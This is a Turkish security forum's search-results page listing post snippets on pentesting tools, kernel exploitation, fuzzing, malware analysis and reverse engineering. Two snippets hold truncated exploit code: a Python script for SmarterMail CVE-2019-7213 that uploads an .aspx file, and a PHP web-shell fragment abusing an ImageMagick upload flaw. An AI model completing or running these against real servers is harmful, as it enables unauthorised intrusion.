Arama sonuçlarınız

  1. S

    Shell Hakkında

    Yetki Yükseltme: https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html Komut: https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py Tünel: https://github.com/sensepost/reGeorg /* Pentest süreçleri için faydalı olabileceğine inanıyorum. Siber...
  2. S

    Ghidra ile Web Hacking I

    CVE-2021-31667 Bismillâhirrahmânirrahîm Son zamanlarda merak edilen Ghidra aracı ile birkaç analiz yapmak hem de çok detaya girmeden yeni nesil ‘Web Application’ kategorisine bir nebze de olsa katkıda bulunmak amacıyla bu yazıyı yazmak istedim. Bugün incelenecek olan yazılım ise Lumenvox...
  3. S

    Kernel Exploitation Notları - figbux

    vmapped kernel stack and thread_info relocation on x86 https://outflux.net/blog/archives/2016/12/12/security-things-in-linux-v4-9/
  4. S

    SmarterMail 16.x Exploit (CVE-2019-7213)

    #!/usr/bin/python3 import requests, json, argparse from requests_toolbelt.multipart.encoder import MultipartEncoder #example usage: #Authenticated #python3 exp.py -w http://mail.site.com/ -f ast.aspx #Change username & password ! class Tak: def __init__(self): self.file_upload()...
  5. S

    Soru-Cevap

    index-of.es/ şu pdf daha detaylı anlamana yardımcı olacaktır mevzuları, her halükarda @nethunt3r zaten gerekli açıklamayı yapmış hem sorunun detayı hem cevabın sadeliği gayet ilgi çekici olmuş ellerinize sağlık. Merhabalar, bildiğim kadarıyla brutelogic denen bir eleman var bu XSS işleriyle pek...
  6. S

    Türkçe'ye Çevrilecek Yabancı Makaleler Hk

    Merhabalar, Türkçe diline özgü şekilde yabancı makale(pdf, epub, blog yazısı vb.) çevirisi için acaba bir çalışma yapılabilir mi ? Örneğin; phrack ve exploit-db makaleleri olabilir.
  7. S

    Modern Bir Zafiyetin Anatomisi Vol. II

    İlk seride(Modern Bir Zafiyetin Anatomisi Vol. I) elimizden geldiği kadar açıklamalar ve mevzunun mahiyeti hakkında bilgiler sunmaya çalıştık şimdi seriye statik kod analizi ile devam edeceğiz. Bahse konu zafiyetin nasıl oluştuğu konusunda teknik olarak aslında bir bilgimiz var ve ona ‘taşma’...
  8. S

    Bluetooth Low Energy ( BLE ) - Part 2 : MITM

    @blacknbunny dediği gibi bir de fuzzing muhabbeti vs. olsa tadından yenmez, çalışma çok özgün ve özel yeni yazılarını bekliyor olacağız.
  9. S

    Malware Analysis - Static Analysis (Part 2)

    İçerik hem bilgilendirici hem geçmiş serisiyle birlikte tam bir bütün olarak bu alandaki eksikliğe bir nebze de olsa katkıda bulunacağa benziyor. Bu şekilde özgün içeriklerin üretilmesi analiz yapan arkadaşlar için rehber bir kaynak olacaktır. Ek olarak açık kaynak platformlarda geliştirilen...
  10. S

    Raporlar, Analiz, Konsept - Syzkaller

    Merhabalar, son dönemlerde syzkaller ile fuzzing muhabbetlerinden mütevellit şuraya bir küçük fuzz çıktısı atma ihtiyacı duydum. Hem bu rapor üzere konuşmak, hem beyin fırtınasıyla exploit yöntemleri aramanın farklı çalışmalara vesile olacağı kanaatindeyim. Syzkaller hit 'KASAN: use-after-free...
  11. S

    Imagemagick Tokmakci Shell

    Bir ara can sıkıntısından yazmıştım sanırım üstünden bayâ vakit geçti, imagemagick upload açığının shell dökülmüş mini hali; <?php $deger = getcwd(); if(isset($_POST['SubmitButton'])){ unlink("$deger"."/out.png"); $input = $_POST['inputText']; $imag = fopen("file.svg", "w"); $que = "push...
  12. S

    Modern Bir Zafiyetin Anatomisi Vol. I

    Son zamanlarda fuzzing project altında piyasaya çıkan yardımcı yazılımların davranışsal hareketlerini kısaca açıklamak istiyorum ve fuzzing project adı altında gerçekleşen uygulamaların sınıflarından bahsetmekte de fayda görüyorum. Öncelikle Fuzzing: Brute Force Vulnerability Discovery...
Üst